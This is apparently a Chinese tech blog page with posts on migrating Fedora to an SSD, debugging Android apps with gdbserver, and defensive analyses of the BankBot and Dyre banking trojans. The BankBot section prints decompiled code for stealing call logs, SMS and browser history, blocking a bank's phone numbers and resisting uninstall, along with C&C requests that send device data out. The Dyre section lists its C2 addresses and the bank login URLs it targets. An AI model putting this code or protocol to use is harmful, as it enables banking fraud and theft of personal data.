发表于

由于某些需求,决定上SSD,提高一下硬盘读写速度。上二手东买了三星(SAMSUNG) 860 EVO
最初的想法是作为数据盘使用,即操作系统还是跑在机械硬盘上,仔细一思考,还是折腾
一下,要不实在是有些浪费,事实证明,折腾是值得的,感觉就想飞一样。

首先查看一下原始的情况:

1
2
3
4
$ mount
/dev/sda1 on /boot type ext4 (rw,relatime,seclabel,stripe=4)
/dev/mapper/fedora-root on / type ext4 (rw,relatime,seclabel)

当然首先要把SSD处理一下,安装一下 gparted 图形化界面很好用。建个分区表,选择
gpt,分个区,/dev/mapper/fedora-root 大小为50G,先分个50G的分区,剩下的全部给
另外一个分区,格式化为 ext4。操作完成后,用fdisk 查看一下:

1
2
3
4
5
6
7
8
9
10
11
12
$ fdisk -l
Disk /dev/sdb:232.9 GiB,250059350016 字节,488397168 个扇区
单元:扇区 / 1 * 512 = 512 字节
扇区大小(逻辑/物理):512 字节 / 512 字节
I/O 大小(最小/最佳):512 字节 / 512 字节
磁盘标签类型:gpt
磁盘标识符:
设备            起点      末尾      扇区   大小 类型
/dev/sdb1       2048 104859647 104857600    50G Linux 文件系统
/dev/sdb2  104859648 488396799 383537152 182.9G Linux 文件系统

将原来系统的 / dd 到新的SSD,

1
dd if=/dev/mapper/fedora-root of=/dev/sdb1 bs=1M

用新的root 把系统启动起来,reboot 后进入引导界面,按e 编译,找到
root=/dev/fedora/root 改为 root=/dev/sdb1 按 ctrl+x 启动,一会儿就进系统了,速度
提升很大。现在需要把 grub.cfg 更新一下,因为我们是手动修改进入了新的根,如果重启
的话,还是会使用老的根,因为grub.cfg 里就是这么写的。

要生成新的grub.cfg 需要使用grub2-mkconfig, 命令很简单

$ grub2-mkconfig -o /boot/grub2/grub.cfg

执行后重启,md 怎么又进到老根去了。这里折腾了好久,第一个问题fedora 的内核出bug
了,每次重启都要等待非常久的时间,所以需要升级,所以正确的顺序应该是先升级系统再
dd,没办法升级系统重新 dd

解决了fedora 内核的问题后,发现还是进不到新根。只要认真地看 grub.cfg, grub2 改动
挺大,不太熟悉了。

1
2
3
4
#                                      
# DO NOT EDIT THIS FILE                                                                                                                                                                       #                                                   
# It is automatically generated by grub2-mkconfig using templates                                                                                                                             
# from /etc/grub.d and settings from /etc/default/grub

启动有两个信息,确实是使用 grub2-mkconfig 生成,/etc/default/grub 里有配置

1
2
3
4
5
6
7
8
9
10
$ cat /etc/default/grub
GRUB_TIMEOUT=5
GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
GRUB_DEFAULT=saved
GRUB_DISABLE_SUBMENU=true
GRUB_TERMINAL_OUTPUT="console"
GRUB_CMDLINE_LINUX="rd.driver.blacklist=nouveau modprobe.blacklist=nouveau nvidia-drm.modeset=1 rd.lvm.lv=fedora/root rd.lvm.lv=fedora/swap rhgb quiet"                                      
GRUB_DISABLE_RECOVERY="true"

grub2-mkconfig 里用这句

1
GRUB_DEVICE="`${grub_probe} --target=device /`"

执行查看结果, 发现正确

1
2
3
$ grub2-probe --target=device /
/dev/sdb1

可是为什么不能正确启动呢,看看生成的 grub.cfg 文件

linux16 /vmlinuz-4.17.2-200.fc28.x86_64 root=UUID=290a98e3-7937-49db-a971-4d0e49567cf0

使用的是 UUID,并不是 /dev, 查看一下各分区的 uuid

1
2
3
4
# blkid
/dev/sdb1: UUID="290a98e3-7937-49db-a971-4d0e49567cf0" TYPE="ext4" PARTUUID="fe64f395-7520-42c3-939b-b17eb7064cec"
/dev/mapper/fedora-root: UUID="290a98e3-7937-49db-a971-4d0e49567cf0" TYPE="ext4"

由于dd 的原因,/dev/sdb1 和 /dev/mapper/fedora-root 的 UUID 居然是相同的。第一个
想法是把/dev/sdb1 的 UUID 给改了。放狗搜发现有下面的方法

1
2
3
4
$ uuidgen 
8e4c27b2-c63e-4d1d-8ac4-5ddd90669eb0
tune2fs /dev/{device} -U {uuid}

可是tune2fs 时报错,死活改不过来。lzx 提示可以看看如何是grub.cfg 不使用uuid,
发现有个参数 GRUB_DISABLE_UUID=true, 在 /etc/default/grub 加上这行,重新生成
grub.cfg 重启,一切 OK 进入到SSD 的新root

有的系统上的参数可能不太一样,ubuntu 系统里这个参数好像的是 GRUB_DISABLE_LINUX_UUID=true
可能需要确认一下。

  • EOF

发表于

没有root的设备,要使用gdbserver 调试app 会遇到权限问题。(emulator 没有问题)

1
2
3
1|shell@mako:/data/local/tmp $ ./gdbserver :1234 --attach 16907
Cannot attach to lwp 16907: Operation not permitted (1)
Exiting

Android 系统提供了一个run-as 命令来暂时切换用户,但是这个命令有限制,必须是app
打开了debuggable才行,否则会报 Package xx is not debuggable 的错误。

http://android.googlesource.com/platform/system/core.git/+/master/run-as/run-as.c
的注释来看,主要的作用有两个:

  1. 可以查看开发这自己应用的数据
  2. 可以使用gdb_server 进行native 的debug

我们的需求是第2个,我们希望可以使用gdb_server 来调试 app

1
2
3
4
5
6
shell@mako:/ $ run-as
Usage: run-as <package-name> <command> [<args>]
shell@mako:/ $ 
shell@mako:/ $ run-as system_server /data/tmp/gdbserver --attach 596 :1234
run-as: Package 'system_server' is unknown

翻看源码,发现有下面 代码:

1
2
3
4
5
6
7
8
/* reject system packages */
if (userAppId < AID_APP) {
    panic("Package '%s' is not an application\n", pkgname);
}
/* reject any non-debuggable package */
if (!info.isDebuggable) {
    panic("Package '%s' is not debuggable\n", pkgname);
}

限制比较严格,调试系统app估计是没什么戏,root了应该就没有问题了。但是调试一般的app
还是没有问题的,用apktool 将 AndroidManifest.xml 的 debuggable 设置为true,重新
打包就可以进行native 的 debug 了。

下面以CVE-2014-7911的POC为例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.heen.CVE_2014_7911">
    <application
        android:allowBackup="true"
        android:debuggable="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:theme="@style/AppTheme" >
        <activity
            android:name=".MainActivity"
            android:label="@string/app_name" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest>

这个app 正好 android:debuggable=”true” 不用修改了,在模拟器上安装这个app。搭建
gdb调试环境, 分下面几个步骤走:

  1. 创建几个目录
1
2
3
mkdir ~/Android
mkidr ~/Android/system_lib
mkidr ~/Android/vendor_lib
  1. 将Android 设置上的lib下载到本地
1
2
3
4
5
6
7
8
9
10
11
12
13
14
cd ~/Android/system_lib/
adb pull /system/lib
cd ~/Android/vendor_lib/
adb pull /vendor/lib
cd ~/Android
# 在64位系统 /system/bin/app_process32 和 /system/bin/app_process64
adb pull /system/bin/app_process
cd ~/Android
adb pull /system/bin/linker
  1. 上传gdbserver
1
adb push $NDK_PATH/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp/gdbserver

环境基本搭建好了,测试一下 run-as 命令

1
2
3
4
5
6
7
8
> adb shell ps
...
u0_a86    16907 174   900568 38564 ffffffff 00000000 S com.heen.CVE_2014_7911
...
> adb shell run-as com.heen.CVE_2014_7911 id
uid=10086(u0_a86) gid=10086(u0_a86) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:untrusted_app:s

已经切换过来了,uid 变了,挂上gdbserver

1
2
3
4
> adb shell run-as com.heen.CVE_2014_7911 /data/local/tmp/gdbserver :123 --attach 16907
Can't open socket: Permission denied.
Exiting

报了另外一个错误,还是不行,google 一翻发现有debug-pipe 参数,尝试了一下

1
2
3
> adb shell run-as com.heen.CVE_2014_7911 /data/local/tmp/gdbserver +debug-pipe --attach 16907
Attached; pid = 16907
Listening on Unix socket debug-pipe

恩,现在没有报错了,执行一下端口转发。

1
adb forward tcp:5039 localfilesystem:/data/data/com.heen.CVE_2014_7911/debug-pipe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
> $NDK_PATH/toolchains/arm-linux-androideabi-4.9/prebuilt/linux-x86_64/bin/arm-linux-androideabi-gdb ~/Android/app_process 
GNU gdb (GDB) 7.6
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "--host=x86_64-linux-gnu --target=arm-linux-android".
For bug reporting instructions, please see:
<http://source.android.com/source/report-bugs.html>...
Reading symbols from /home/henices/Android/app_process...(no debugging symbols found)...done.
(gdb) target remote :5039
Remote debugging using :5039
warning: Could not load shared library symbols for 100 libraries, e.g. /system/bin/linker.
Use the "info sharedlibrary" command to see the complete listing.
Do you need "set solib-search-path" or "set sysroot"?
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
0x4013a73c in ?? ()
(gdb) info proc
process 16907
cmdline = 'com.heen.CVE_2014_7911'
cwd = '/'
exe = '/system/bin/app_process'
(gdb) set solib-search-path ~/Android:~/Android/system_lib/:~/Android/vendor_lib/
(gdb) info sharedlibrary
0x400f3a60  0x400fe79c  Yes (*)     /home/henices/Android/linker
0x40126070  0x401566ec  Yes (*)     /home/henices/Android/system_lib/libc.so
0x40174828  0x401749c8  Yes (*)     /home/henices/Android/system_lib/libstdc++.so
0x401798f0  0x4018c478  Yes (*)     /home/henices/Android/system_lib/libm.so
0x40114f50  0x40116490  Yes (*)     /home/henices/Android/system_lib/liblog.so
0x4010c38c  0x40110988  Yes (*)     /home/henices/Android/system_lib/libcutils.so
0x401acb1c  0x401af20c  Yes (*)     /home/henices/Android/system_lib/libgccdemangle.so
0x401a81d0  0x401a94ac  Yes (*)     /home/henices/Android/system_lib/libcorkscrew.so
0x4019b780  0x401a1f24  Yes (*)     /home/henices/Android/system_lib/libutils.so
0x401cbc50  0x401d5ba4  Yes (*)     /home/henices/Android/system_lib/libbinder.so
0x402955f0  0x4029585c  Yes (*)     /home/henices/Android/system_lib/libhardware.so
0x402925d0  0x40292834  Yes (*)     /home/henices/Android/system_lib/libmemtrack.so
0x402bbbf0  0x402cb80c  Yes (*)     /home/henices/Android/system_lib/libz.so
0x402a4240  0x402b23fc  Yes (*)     /home/henices/Android/system_lib/libandroidfw.so
0x402d6774  0x402e53a0  Yes (*)     /home/henices/Android/system_lib/libexpat.so
0x403083a8  0x4031e684  Yes (*)     /home/henices/Android/system_lib/libstlport.so

OK, 已经可以调试了。

发表于

0x00 样本概况

字段 内容
样本名 BankBot
MD5 3c42c391bec405bb28b28195c2961778
SHA256 93b64019ee48177889d908c393703a2a2fe05ca33793c14b175467ce619b1b94
文件类型 APK

这是一个以盗窃信用卡用户密码为主要目的的bot。安装后显示为Android图标。打开App后
会以Android系统更新的形式,诱导用户操作达到常驻系统的目的。

0x01 行为分析

开机自启动

1
2
3
4
5
6
7
8
9
10
11
12
<receiver android:name="com.android.market.Autorun">
    <intent-filter android:priority="999">
        <action android:name="android.intent.action.REBOOT" />
        <action android:name="android.intent.action.BOOT_COMPLETED" />
        <action android:name="android.intent.action.QUICKBOOT_POWERON" />
    </intent-filter>
    <intent-filter android:priority="1000">
        <action android:name="android.intent.action.REBOOT" />
        <action android:name="android.intent.action.BOOT_COMPLETED" />
        <action android:name="android.intent.action.QUICKBOOT_POWERON" />
    </intent-filter>
</receiver>

Autorun

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package com.android.market;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
public final class Autorun extends BroadcastReceiver {
    public Autorun() {
        super();
    }
    public void onReceive(Context context, Intent intent) {
        Intent v0 = new Intent(context, Scheduler.class);
        v0.setFlags(0x10000000);
        context.startService(v0);
    }
}

开机将启动 Schedule 服务

Schedule 服务

1
2
3
4
5
6
7
8
9
10
11
12
13
public int onStartCommand(Intent intent, int flags, int startId) {
    super.onStartCommand(intent, flags, startId);
    Utils.registerIfNeeded(((Context)this));
    Object v0 = this.getSystemService("alarm");
    PendingIntent v6 = PendingIntent.getBroadcast(((Context)this), 0, new Intent(((Context)this), 
            NetworkController.class), 0);
    int v7 = FileController.fileExists(((Context)this), "interval") ? Integer.parseInt(FileController
            .readFile(((Context)this), "interval")) : 0xA;
    ((AlarmManager)v0).setRepeating(0, System.currentTimeMillis() + 0x2710, ((long)(v7 * 0x3E8)), 
            v6);
    this.handleCrashes();
    return 1;
}

Schedule 服务使用alarm manager 注册一个定时任务。这个定时任务由NetworkController完成。
时间间隔由配置文件interval决定。

com.android.market.FileController

1
2
3
static final boolean fileExists(Context context, String filename) {
    return new File(context.getFilesDir(), filename).exists();
}

隐藏App 图标

1
2
3
4
5
6
7
static final void hideApp(Context context, boolean hide) {
    ComponentName v0 = new ComponentName(context.getPackageName(), String.valueOf(context.getPackageName())
             + ".MainActivity");
    PackageManager v3 = context.getPackageManager();
    int v1 = hide ? 2 : 1;
    v3.setComponentEnabledSetting(v0, v1, 1);
}

伪造的系统Notification

1
2
3
4
5
6
7
8
9
10
11
12
13
14
public void onCreate() {
    super.onCreate();
    new AppCrash().Register(((Context)this));
    Notification v3 = new Notification(0x108008A, "Android system requires user action", System.
            currentTimeMillis());
    Intent v1 = new Intent(this.getApplicationContext(), AdminX.class);
    v1.setAction("android.intent.action.VIEW");
    v1.setFlags(0x34000000);
    v3.setLatestEventInfo(this.getBaseContext(), "Android", "Android system requires action", PendingIntent
            .getActivity(((Context)this), 0, v1, 0x8000000));
    v3.flags |= 0x62;
    this.startForeground(2, v3);
    new Helper(this).execute(new Void[0]);
}

禁用屏幕锁定

1
AdminX.this.getSystemService("keyguard").newKeyguardLock("ANDROID").disableKeyguard();

禁止拨打指定号码电话

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
public void onReceive(Context context, Intent intent) {
    String[] v8;
    String action = intent.getAction();
    String v6 = intent.getStringExtra("state");
    String v3 = intent.getStringExtra("incoming_number");
    String v5 = intent.getStringExtra("android.intent.extra.PHONE_NUMBER");
    String v1 = "8005555550; 4955005550;";
    String v10 = "8005555550; 4955005550;";
    String v11 = "";
    int v9 = 0;
    if(action.equals("android.intent.action.NEW_OUTGOING_CALL")) {
        String v4 = v5.replace("+", "").replace("#", "d").replace("*", "s").replace(" ", "").replace(
                "-", "");
        if(v1 != null) {
            v8 = v1.replace(" ", "").split(";");
            if(v8.length > 0) {
                int v13;
                for(v13 = 0; v13 < v8.length; ++v13) {
                    if(v4.contains(v8[v13])) {
                        v9 = 1;
                        v11 = String.valueOf(v11) + "blocked outgoing call";
                        this.setResultData(null);
                    }
                }
            }
        }
        if(v9 == 0) {
            v11 = String.valueOf(v11) + "outgoing call";
        }
        new ReportWithDataTask(context, "call_data").execute(new Object[]{"[" + this.toJSON(v4, 
                v11) + "]"});
    }
  ...
 }

通过网页 http://www.sberbank.com/news-and-media/contacts 中的信息我们可以知道:

8005555550 4955005550 这两个号码 sberbank 的号码,在俄罗斯拨打免费。

禁止接听指定号码电话

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
String v10 = "8005555550; 4955005550;";
if((action.equals("android.intent.action.PHONE_STATE")) && (v6.equals("RINGING"))) {
String v2 = v3 != null ? v3.replace("+", "").replace("#", "d").replace("*", "s").replace(
        " ", "").replace("-", "") : "Unknown";
if(v10 != null) {
    v8 = v10.replace(" ", "").split(";");
    for(v13 = 0; v13 < v8.length; ++v13) {
        if(v2.contains(v8[v13])) {
            v11 = "blocked incoming call";
            v9 = 1;
            this.hangUp(context);
        }
    }
    if(!v2.contains("Unknown")) {
        goto label_106;
    }
    v11 = "blocked incoming call";
    v9 = 1;
    this.hangUp(context);
}
label_106:
if(v9 == 0) {
    v11 = "incoming call";
}
new ReportWithDataTask(context, "call_data").execute(new Object[]{"[" + this.toJSON(v2, 
        v11) + "]"});
}

隐私窃取

获取电话拨打记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
private StringBuilder getCallLog() {
    StringBuilder v20 = new StringBuilder("[");
    String v18 = "O||U|T||||G|O|||I|N||G|".replace("|", "");
    Cursor v10 = this.context.getContentResolver().query(CallLog$Calls.CONTENT_URI, null, null, 
            null, null);
    String v15 = "I++N+C+O+++M+I++N+G+".replace("+", "");
    String v16 = "M-I--S--S---E--D---".replace("-", "");
    String v22 = "***{\"n*u**mb**e*r\"***:%s,\"da****te\":%s,\"d*u*ra****ti*o***n\":%s,\"t*yp***e\":%s}*"
            .replace("*", "");
    if((v10.moveToFirst()) && v10.getCount() > 0) {
        int v17 = v10.getColumnIndex("number");
        int v21 = v10.getColumnIndex("type");
        int v11 = v10.getColumnIndex("date");
        int v14 = v10.getColumnIndex("duration");
        while(!v10.isAfterLast()) {
            String v19 = v10.getString(v17);
            String v9 = v10.getString(v21);
            String v7 = v10.getString(v11);
            String v8 = v10.getString(v14);
            String v13 = null;
            switch(Integer.parseInt(v9)) {
                case 1: {
                    v13 = v15;
                    break;
                }
                case 2: {
                    v13 = v18;
                    break;
                }
                case 3: {
                    v13 = v16;
                    break;
                }
            }
            v20.append(String.format(Locale.US, v22, JSONObject.quote(v19), JSONObject.quote(
                    v7), JSONObject.quote(v8), JSONObject.quote(v13)));
            if(!v10.isLast()) {
                v20.append(",");
            }
            v10.moveToNext();
        }
        v10.close();
    }
    return v20.append("]");
}

获取短信记录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
private StringBuilder getSmsLog() {
    StringBuilder v10 = new StringBuilder("[");
    Cursor v8 = this.context.getContentResolver().query(Uri.parse("content://ABC".replace("A", 
            "s").replace("B", "m").replace("C", "s")), null, null, null, null);
    if((v8.moveToFirst()) && v8.getCount() > 0) {
        while(!v8.isAfterLast()) {
            v10.append(String.format(Locale.US, "{\"address\":%s,\"body\":%s,\"date\":%s}", 
                    JSONObject.quote(v8.getString(v8.getColumnIndex("address"))), JSONObject
                    .quote(v8.getString(v8.getColumnIndex("body"))), JSONObject.quote(v8.getString(
                    v8.getColumnIndex("date")))));
            if(!v8.isLast()) {
                v10.append(",");
            }
            v8.moveToNext();
        }
        v8.close();
    }
    return v10.append("]");
}

浏览器书签

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
private StringBuilder getHistory(Uri historyUri) {
    StringBuilder v8 = new StringBuilder("[");
    Cursor v6 = this.context.getContentResolver().query(historyUri, new String[]{"title", "url", 
            "date"}, "bookmark = 0", null, null);
    if((v6.moveToFirst()) && v6.getCount() > 0) {
        while(!v6.isAfterLast()) {
            v8.append(String.format(Locale.US, "{\"title\":%s,\"url\":%s,\"date\":%s}", JSONObject
                    .quote(v6.getString(v6.getColumnIndex("title"))), JSONObject.quote(v6.getString(
                    v6.getColumnIndex("url"))), JSONObject.quote(v6.getString(v6.getColumnIndex(
                    "date")))));
            if(!v6.isLast()) {
                v8.append(",");
            }
            v6.moveToNext();
        }
        v6.close();
    }
    return v8.append("]");
}

骗取信用卡信息

当用户打开Google Play 应用时,打开伪造的Activity,诱使用户输入信用卡信息。

高级技术

不断重启的Servcie

com.android.smali3

1
2
3
4
public void onDestroy() {
    super.onDestroy();
    this.startService(new Intent(this.getApplicationContext(), smali3.class));
}

服务被停止,立即重启,无法停止。

防止卸载

Bankbot 申请 Device Admin 权限,无法被正常卸载。

1
2
> adb shell pm uninstall com.android.market
Failure

禁止删除 Device Admin 权限

这个一个非常流氓的做法,具体的做法是如下面的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
public class AdRec extends DeviceAdminReceiver {
    public AdRec() {
        super();
    }
    public CharSequence onDisableRequested(Context context, Intent intent) {
        new AppCrash().Register(context);
        if(Build$VERSION.SDK_INT <= 0xA) {
            Intent v2 = new Intent("android.settings.SETTINGS");
            v2.setFlags(0x50000000);
            context.startActivity(v2);
            Intent v4 = new Intent("android.intent.action.MAIN");
            v4.addCategory("android.intent.category.HOME");
            v4.setFlags(0x10000000);
            context.startActivity(v4);
            return "WARNING! Your device will now reboot to factory settings.\n\nClick \"Yes\" to erase your data and continue. \"No\" for cancel.";
        }
        context.startService(new Intent(context, ASec.class));
        long v6 = 0x7D0;
        try {
            Thread.sleep(v6);
        }
        catch(InterruptedException v3) {
            v3.printStackTrace();
        }
        return "WARNING! Your device will now reboot to factory settings.\n\nClick \"Yes\" to erase your data and continue. \"No\" for cancel.";
    }
   ...
}

重写 DeviceAdminReceiver 的 onDisableRequest 方法。使用 Thread.sleep 方法使用户
无法操作界面,在此期间采取 Activity 切换的方法绕开取消激活的步骤。

这里出过几个问题,

  1. Backdoor.AndroidOS.Obad.a 使用的,在设备管理器中隐身
  2. 就是现在代码中所用到这个,目前在所有的Android 版本中存在。

界面劫持

通过界面劫持,诱使用户将App设置为设备管理器。从下图中可以看见Continues按钮其实
是设备管理器的激活按钮。

使用翠鸟对恶意样本进行检查的结果

0x02 C&C 协议分析

Bankbot 以固定时间轮询的方式向C&C服务器请求命令,命令的格式为json格式。从代码中
可以得到json字段的信息。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
private static final String FIELD_ACTION = "action";
private static final String FIELD_CALL_LOG = "call_log";
private static final String FIELD_DATA = "data";
private static final String FIELD_HISTORY = "browser_history";
private static final String FIELD_ID = "id";
private static final String FIELD_IMEI = "imei";
private static final String FIELD_INTERCEPT = "intercept";
private static final String FIELD_MAYHEM = "mayhem";
private static final String FIELD_MESSAGE = "prefix_1";
private static final String FIELD_NEW_SERVER = "server";
private static final String FIELD_NUMBER_SEND_TO = "number_1";
private static final String FIELD_OPERATOR = "op";
private static final String FIELD_PHONE = "phone";
private static final String FIELD_POLL_INTERVAL = "server_poll";
private static final String FIELD_PREFIX = "prefix";
private static final String FIELD_REPORT_CALLS = "calls";
private static final String FIELD_SMS_HISTORY = "sms_history";
private static final String FIELD_SPAM = "text_2";
private static final String FIELD_STATUS = "status";
private static final String FIELD_URL_TO_SHOW = "url";
private static final String FIELD_VERSION = "version";

请求注册

返回报文

401

注册报文

请求报文

1
2
3
4
5
6
7
POST /p/gate.php HTTP/1.1
Content-Length: 106
Content-Type: application/x-www-form-urlencoded
Host: quick-sshopping.com
Connection: Keep-Alive
action=reg&imei=098767899076562&phone=15802920457&op=Android&version=4.4.4%2C3.4.0-gd853d22&prefix=12Jhw21

响应报文

1
2
3
4
5
6
7
8
9
10
11
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 23 Feb 2016 07:25:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.31
3
200
0

获取命令

1
2
3
4
5
6
7
POST /p/gate.php HTTP/1.1
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Host: quick-sshopping.com
Connection: Keep-Alive
action=poll&imei=098767899076562
1
2
3
4
5
6
7
8
9
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Tue, 23 Feb 2016 07:25:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.31
0

返回的命令为json 格式,主要的指令有下面几个,

指令 含义
401 要求 bot 注册
call_log 获取电话记录, 发送到C&C server
sms_history 获取短信内容,发送到C&C server
browser_history 获取浏览器书签,发送到C&C server
url 访问url 链接
server 更换C&C server
intercept
server_poll 更新从服务器获取命令的时间间隔
mayhem
calls

监视服务了大半天,没有收到有效指令,看来不是特别活跃。

0x03清除

这个App的清除非常费劲,原因就是注册为设备管理器的app不能卸载,而这个App又使诈
不让我们取消设备管理器,估计只有root的机器会好处理一些。

0x04总结

BankBot 样本,代码编写的相当规范,风格严谨,是正规程序员的作品。但行为非常流氓,
很顽固,不容易清除。所以遇到申请device admin 权限的程序一定要小心谨慎,以免不良
后果。而Android的界面劫持也是一个严重的问题,估计后续利用这些技术的恶意App的数量
会越来越多。

发表于

0. 概述

sha256   : 523b9e8057ef0905e2c7d51b742d4be9374cf2eee5a810f05d987604847c549d
md5      : c2d73485095efdbd7ab625e469affb11
filename : Invoice_00739287.scr

脱壳后的程序中可以看到 C:\CPP_PROJECTS_GIT\DYRE\x64\Release\dyrecontroller.pdb
因此大多数杀软将样本命名为dyre。Dyre的主要目标为在线银行。

样本看上去是一个PDF文件,其实则是使用scr后缀的可执行文件,引诱受害者点击文件。

Dyre的样本 MD5:

  • 999bc5e16312db6abff5f6c9e54c546f
  • b44634d90a9ff2ed8a9d0304c11bf612
  • dd207384b31d118745ebc83203a4b04a

1. 感染与传播

从网上的公开资料来看,样本主要传播途径为钓鱼邮件。

2. 工作流程

  • 复制自身 (C:\Documents and Settings\user\Application Data\googleupdaterr.exe)
  • 执行复本文件
  • 删除自身
  • 注入Explorer 进程
  • googleupdaterr.exe 进程退出

由于注入Explorer后,进程退出,在任务管理器中看不到任何可疑进程,代码在Explorer中
执行。Dyrez 通过写注册表启动项实现自启动,系统启动后将自动执行恶意文件。

1
2
key   : HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\GoogleUpdate
value : C:\Documents and Settings\sys\Application Data\googleupdaterr.exe

3. 网络协议

由于时间较长了,url链接基本都访问不了了,所以这部分内容就不重点说了。

http://192.99.6.61/cho1017/W512600.19532DF60D132DC4E0153BE41218BD1A/5/publickey/
和 217.12.207.151:8900 和 192.99.6.61:80 都已失效。

可以参考下面这篇文章的图片

Project Dyre: New RAT Slurps Bank Credentials, Bypasses SSL

4. 高级技术

4.1 脱壳

这个样本使用了反混淆技术,不仔细看的话就像一个正常的MFC程序,其实运行到一定阶段,
进程空间里所有的代码都被替换。

OEP应该是4021F0,在OD里设置硬件执行断点,F9就可以dump了,修复IAT后可以正常运行。

4.2 进程注入

我们的目标代码应该是注入到Explorer中的代码。其实脱壳后的样本的资源文件里包含了
注入到Explorer的代码,分别是PAYLOAD32和PAYLOAD64.

Dyre的进程注入和一般的样本有一定的区别,使用了ZwQueueApcThread来启动,而并没有
是使用ZwSetContextThread。在跨进程写则使用了ZwMapViewOfSection而没有使用大家熟悉
的ZwWriteVirtualMemory,隐蔽性较强。

新版的Ollydbg 2.01, 支持调试子进程,在子进程中可以看到以下代码

附录A

strings

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
cashproonline.bankofamerica.com/AuthenticationFrameworkWeb/cpo/login/public/loginMain.faces
businessaccess.citibank.citigroup.com/cbusol/signon.do
www.bankline.natwest.com/CWSLogon/logon.do?CTAuthMode=RBSG_CORP4P&domain=.bankline.natwest.com&ct-web-server-id=Internet&CT_ORIG_URL=%2Fbankline%2Fnatwest%2Fdefault.jsp&ct_orig_uri=https%3A%2F%2Fwww.bankline.natwest.com%3A443%2Fbankline%2Fnatwest%2Fdefault.jsp
www.bankline.rbs.com/CWSLogon/logon.do?CTAuthMode=RBSG_CORP4P&domain=.bankline.rbs.com&ct-web-server-id=Internet&CT_ORIG_URL=%2Fbankline%2Frbs%2Fdefault.jsp&ct_orig_uri=https%3A%2F%2Fwww.bankline.rbs.com%3A443%2Fbankline%2Frbs%2Fdefault.jsp
www.bankline.ulsterbank.ie/CWSLogon/logon.do?CTAuthMode=RBSG_CORP4P&domain=.bankline.ulsterbank.ie&ct-web-server-id=Internet&CT_ORIG_URL=%2Fbankline%2Fubr%2Fdefault.jsp&ct_orig_uri=https%3A%2F%2Fwww.bankline.ulsterbank.ie%3A443%2Fbankline%2Fubr%2Fdefault.jsp
TRUE
AUTOBACKCONN
%02x
cashproonline.bankofamerica.com/materials
user_id=
company_id=
businessaccess.citibank.citigroup.com/materials
business_code=
business_name=
0x%x
85.25.148.6
c1shproonline.bankofamerica.com
cashproonline.bankofamerica.com/AuthenticationFrameworkWeb/
cashproonline.bankofamerica.com/assets/
b1sinessaccess.citibank.citigroup.com
businessaccess.citibank.citigroup.com/assets/
businessaccess.citibank.citigroup.com/CitiBusinessOnlineFiles/
www.b1nkline.natwest.com
www.bankline.natwest.com/
www.b1nkline.rbs.com
www.bankline.rbs.com/
www.b1nkline.ulsterbank.ie
www.bankline.ulsterbank.ie/

参考资料

发表于

概况

  • MD5: 14792786094250715197540fd3b58439
  • SHA256: 456caeaaa8346c7a9e2198af5a0ca49d87e616a2603884580df22728a49893d7
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1208868505 (0x480dde99)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=CN, ST=sc, L=sc, O=maizi, OU=maizi, CN=pktool
        Validity
            Not Before: Sep  9 09:11:13 2015 GMT
            Not After : Jan 25 09:11:13 2043 GMT
        Subject: C=CN, ST=sc, L=sc, O=maizi, OU=maizi, CN=pktool
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:93:57:2d:52:af:c1:71:cf:7a:cb:2f:6a:6c:0a:
                    b2:3f:4b:60:a6:a7:d0:9d:ba:36:a1:0f:0d:cc:9e:
                    32:ea:23:df:80:a3:b3:9f:2b:93:b9:53:c4:e5:bf:
